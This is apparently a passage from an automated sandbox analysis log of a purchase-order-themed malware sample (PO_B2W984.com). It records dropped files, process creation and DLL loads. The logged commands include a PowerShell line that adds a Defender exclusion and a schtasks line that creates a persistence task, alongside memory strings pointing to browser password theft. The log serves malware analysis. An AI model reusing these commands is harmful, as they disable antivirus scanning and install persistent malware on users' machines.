                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A15_1_00413780
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A19_2_00413780
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A19_2_00413780
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A19_1_00413780
                          Source: C:\Users\user\Desktop\PO_B2W984.comKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002D36000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24180228176.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24191123588.0000000003C90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: PO_B2W984.comReversingLabs: Detection: 27%
                          Source: PO_B2W984.comVirustotal: Detection: 36%
                          Source: C:\Users\user\Desktop\PO_B2W984.comFile read: C:\Users\user\Desktop\PO_B2W984.comJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\PO_B2W984.com "C:\Users\user\Desktop\PO_B2W984.com"
                          Source: C:\Users\user\Desktop\PO_B2W984.comProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\PO_B2W984.comProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Source: unknownProcess created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                          Source: unknownProcess created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                          Source: C:\Users\user\Desktop\PO_B2W984.comProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pifJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /fJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" Jump to behavior
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: edgegdi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: url.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ieframe.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: smartscreenps.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ieproxy.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ieproxy.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ieproxy.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: mssip32.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: mssip32.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: mssip32.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: winhttpcom.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ??????????.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ??.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ???.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ???.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ???.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: am.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ??l.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ??l.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ?.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ?.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ??l.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ????.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ???e???????????.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ???e???????????.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ?.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ?.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ?.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ?.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ??l.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ??l.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: tquery.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: cryptdll.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: spp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: vssapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: vsstrace.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: spp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: vssapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: vsstrace.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: mssip32.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: endpointdlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: endpointdlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: endpointdlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: endpointdlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: advapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: advapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: advapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: advapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: advapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: advapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: advapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: spp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: vssapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: vsstrace.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppwmi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppcext.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: winscard.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: devobj.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: edgegdi.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: version.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: slc.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: edgegdi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: edgegdi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: windows.storage.dllJump to behavior
